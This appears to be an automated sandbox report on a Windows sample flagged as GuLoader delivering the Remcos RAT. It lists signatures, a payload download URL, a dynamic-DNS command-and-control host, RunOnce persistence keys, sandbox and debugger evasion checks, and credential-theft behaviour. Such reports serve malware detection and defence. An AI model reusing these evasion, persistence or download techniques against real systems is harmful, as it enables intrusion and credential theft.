Windows Analysis Report loKmeabs9V.exe

Overview

General Information

Sample Name: loKmeabs9V.exe
Analysis ID: 457916
MD5: e0d74762f123eb6603898d1482eb9752
SHA1: ee63af5c34a027ba8b8331dd678b15e7a87d26a6
SHA256: f06e4c96e86c0f36c82d38de0627c0b81995656c4dcbc136c0fedda868ed8ea0
Tags: exe, RAT
Detection

GuLoader Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • loKmeabs9V.exe (PID: 1536 cmdline: 'C:\Users\user\Desktop\loKmeabs9V.exe' MD5: E0D74762F123EB6603898D1482EB9752)
    • loKmeabs9V.exe (PID: 476 cmdline: 'C:\Users\user\Desktop\loKmeabs9V.exe' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 3576 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 484 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 4112 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny' MD5: E0D74762F123EB6603898D1482EB9752)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      AV Detection:

      Found malware configuration
      Source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin"}
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe, Virustotal: Detection: 20%
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe, ReversingLabs: Detection: 13%
      Multi AV Scanner detection for submitted file
      Source: loKmeabs9V.exe, Virustotal: Detection: 20%
      Source: loKmeabs9V.exe, ReversingLabs: Detection: 13%
      Yara detected Remcos RAT
      Source: Yara match, File source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe, Joe Sandbox ML: detected
      Machine Learning detection for sample
      Source: loKmeabs9V.exe, Joe Sandbox ML: detected
      Source: 22.0.loKmeabs9V.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen2
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 22_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData
      Source: loKmeabs9V.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 22_2_0040AE51 FindFirstFileW,FindNextFileW
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 24_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen

      Networking:

      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor, URLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
      Uses dynamic DNS services
      Source: unknown, DNS query: name: wealthyrem.ddns.net
      Source: global traffic, TCP traffic: 192.168.2.3:49735 -> 194.5.97.128:39200
      Source: Joe Sandbox View, ASN Name: DANILENKODE DANILENKODE
      Source: Joe Sandbox View, ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
      Source: global traffic, HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko; Host: 101.99.94.119; Cache-Control: no-cache
      Source: unknown, TCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
      Source: loKmeabs9V.exe, String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
      Source: loKmeabs9V.exe, String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
      Source: unknown, DNS traffic detected: queries for: wealthyrem.ddns.net
      Source: loKmeabs9V.exe, 00000016.00000003.470222066.0000000000A02000.00000004.00000001.sdmp, String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
      Source: loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
      Source: loKmeabs9V.exe, String found in binary or memory: http://www.ebuddy.com
      Source: loKmeabs9V.exe, String found in binary or memory: http://www.imvu.com
      Source: loKmeabs9V.exe, 00000017.00000002.470384906.000000000019C000.00000004.00000001.sdmp, String found in binary or memory: http://www.imvu.com/.exe
      Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
      Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: http://www.imvu.comr
      Source: loKmeabs9V.exe, 00000016.00000002.472368637.0000000000193000.00000004.00000001.sdmp, String found in binary or memory: http://www.nirsoft.net
      Source: loKmeabs9V.exe, loKmeabs9V.exe, 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: http://www.nirsoft.net/
      Source: loKmeabs9V.exe, String found in binary or memory: https://login.yahoo.com/config/login
      Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmp, String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
      Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmp, String found in binary or memory: https://support.google.com/chrome/answer/6258784
      Source: loKmeabs9V.exe, String found in binary or memory: https://www.google.com
      Source: loKmeabs9V.exe, String found in binary or memory: https://www.google.com/accounts/servicelogin
      Source: loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmp, String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      Installs a global keyboard hook
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\loKmeabs9V.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 22_2_0041183A OpenClipboard,GetLastError,DeleteFileW

      E-Banking Fraud:

      Yara detected Remcos RAT
      Source: Yara match, File source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Process Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B629C NtWriteVirtualMemory,LoadLibraryA
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B5971 NtAllocateVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B9189 NtProtectVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B4230 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B7C19 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B5844 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B9653 NtWriteVirtualMemory,CreateProcessInternalW
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B46C8 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B4CD0 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B9122 NtProtectVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B4352 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B41B6 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B4B96 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B87E3 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 14_2_00569CF6 LdrInitializeThunk,NtProtectVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 14_2_00569DCF LdrInitializeThunk,Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 14_2_00569CF1 LdrInitializeThunk,NtProtectVirtualMemory
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 22_2_00401806 NtdllDefWindowProc_W
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 22_2_004018C0 NtdllDefWindowProc_W
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 23_2_00402CAC NtdllDefWindowProc_A
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 23_2_00402D66 NtdllDefWindowProc_A
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 24_2_004016FC NtdllDefWindowProc_A
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 24_2_004017B6 NtdllDefWindowProc_A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 004169A7 appears 87 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 0044DB70 appears 41 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 004165FF appears 35 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 00412968 appears 78 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 00421A32 appears 43 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 00416760 appears 69 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 0044407A appears 37 times
      Source: loKmeabs9V.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: yourphone.exe.14.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: loKmeabs9V.exe, 00000000.00000000.205287548.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe Binary or memory string: OriginalFilename vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000003.473704439.000000001E84B000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000000.334706774.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000002.1292980091.000000001DEA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs loKmeabs9V.exe
      Source: loKmeabs9V.exe Binary or memory string: OriginalFileName vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000016.00000000.466532006.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000017.00000000.468896528.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000018.00000000.470164942.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe Binary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@9/4@1/3
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File created: C:\Users\user\AppData\Roaming\remcos
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File created: C:\Users\user\AppData\Local\Temp\~DF2A65A40B0FC83CF5.TMP
      Source: loKmeabs9V.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\loKmeabs9V.exe System information queried: HandleInformation
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: loKmeabs9V.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: loKmeabs9V.exe Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
      Source: loKmeabs9V.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
      Source: loKmeabs9V.exe Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: loKmeabs9V.exe Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: loKmeabs9V.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: loKmeabs9V.exe Virustotal: Detection: 20%
      Source: loKmeabs9V.exe ReversingLabs: Detection: 13%
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File read: C:\Users\user\Desktop\loKmeabs9V.exe
      Source: unknown Process created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File opened: C:\Users\user\Desktop\loKmeabs9V.cfg
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

      Data Obfuscation:

      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Unpacked PE file: 22.2.loKmeabs9V.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Unpacked PE file: 23.2.loKmeabs9V.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Unpacked PE file: 24.2.loKmeabs9V.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Yara detected GuLoader
      Source: Yara match File source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_00404DCC push edx; iretd 0_2_00404DD6
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_004059BD push F32E5D69h; retf 0_2_004059D0
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0044693D push ecx; ret 22_2_0044694D
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0044DB70 push eax; ret 22_2_0044DB84
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0044DB70 push eax; ret 22_2_0044DBAC
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_00451D54 push eax; ret 22_2_00451D61
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00414060 push eax; ret 23_2_00414074
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00414060 push eax; ret 23_2_0041409C
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00414039 push ecx; ret 23_2_00414049
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_004164EB push 0000006Ah; retf 23_2_004165C4
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00416553 push 0000006Ah; retf 23_2_004165C4
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00416555 push 0000006Ah; retf 23_2_004165C4
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_00444355 push ecx; ret 24_2_00444365
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_004446D0 push eax; ret 24_2_004446E4
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_004446D0 push eax; ret 24_2_0044470C
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_0044AC84 push eax; ret 24_2_0044AC91
      Source: initial sample Static PE information: section name: .text entropy: 7.07623900315
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File created: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe

      Boot Survival:

      Creates autostart registry keys with suspicious values (likely registry only malware)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B0BC7 TerminateProcess
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B36C3
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B8923
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B5DAE
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B87E3 NtWriteVirtualMemory
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\YOURPHONE.EXE\SUBFOLDER1SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCESTARTUP KEY
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B962D rdtsc 0_2_022B962D
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 22_2_0040DD85
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Window / User API: threadDelayed 9093
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Window / User API: foregroundWindowGot 536
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 2000 Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 5704 Thread sleep count: 9093 > 30
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 5704 Thread sleep time: -45465s >= -30000s
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Thread sleep count: Count: 9093 delay: -5
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0040AE51 FindFirstFileW,FindNextFileW, 22_2_0040AE51
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 23_2_00407898
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen, 24_2_00407C87
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_00418981 memset,GetSystemInfo, 22_2_00418981
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\yourphone.exe\subfolder1Software\Microsoft\Windows\CurrentVersion\RunOnceStartup key
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exe System information queried: ModuleInformation
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information queried: ProcessInformation

      Anti Debugging:

      Hides threads from debuggers
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B962D rdtsc 0_2_022B962D
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B6694 LdrInitializeThunk, 0_2_022B6694
